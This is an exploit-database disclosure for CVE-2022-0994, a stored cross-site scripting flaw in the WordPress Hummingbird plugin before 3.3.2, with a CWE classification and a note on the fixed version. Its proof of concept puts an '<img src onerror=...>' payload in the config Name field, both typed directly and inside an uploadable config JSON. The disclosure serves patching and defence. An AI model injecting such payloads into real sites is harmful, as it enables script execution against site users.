Exploit for WordPress Hummingbird Cross Site Scripting CVE-2022-0994

Name: Exploit for WordPress Hummingbird Cross Site Scripting CVE-2022-0994
Rating: 5 (213 reviews)
2022-04-07 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:166628
Tittle:  
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting  
  
References:  
CVE-2022-0994  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.  
  
Affects Plugins:  
Hummingbird-performance - Fixed in version 3.3.2  
  
Proof of Concept:  
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>  
  
Save and Click 'Apply' to trigger the XSS  
  
Go to Hummingbird's Settings > Configs and Upload the following config  
  
{  
"id": 1,  
"name": "<img src onerror=alert(/XSS/)>",  
"description": "Xss",  
"config": {  
"configs": {  
"settings": {  
"advanced": {  
"query_string": false,  
"emoji": false,  
"cart_fragments": false,  
"lazy_load": {  
"enabled": false  
}  
},  
"database": {  
"reports": {  
"enabled": false  
}  
},  
"gravatar": {  
"enabled": true  
},  
"page_cache": {  
"enabled": true,  
"detection": "auto",  
"integrations": {  
"varnish": false,  
"opcache": false  
},  
"preload": false  
},  
"performance": [],  
"rss": {  
"enabled": true,  
"duration": 3600  
},  
"settings": {  
"accessible_colors": false,  
"remove_settings": false,  
"remove_data": false,  
"control": true  
},  
"uptime": {  
"enabled": false  
}  
}  
},  
"strings": {  
"advanced": [  
"Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"  
],  
"database": [  
""  
],  
"gravatar": [  
"Gravatar cache - Active\n"  
],  
"page_cache": [  
"Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"  
],  
"rss": [  
"RSS caching - Active\n"  
],  
"settings": [  
"High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"  
],  
"uptime": [  
  
"Uptime - Inactive\n"  
]  
}  
},  
  
"plugin": "1081721"  
}   
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a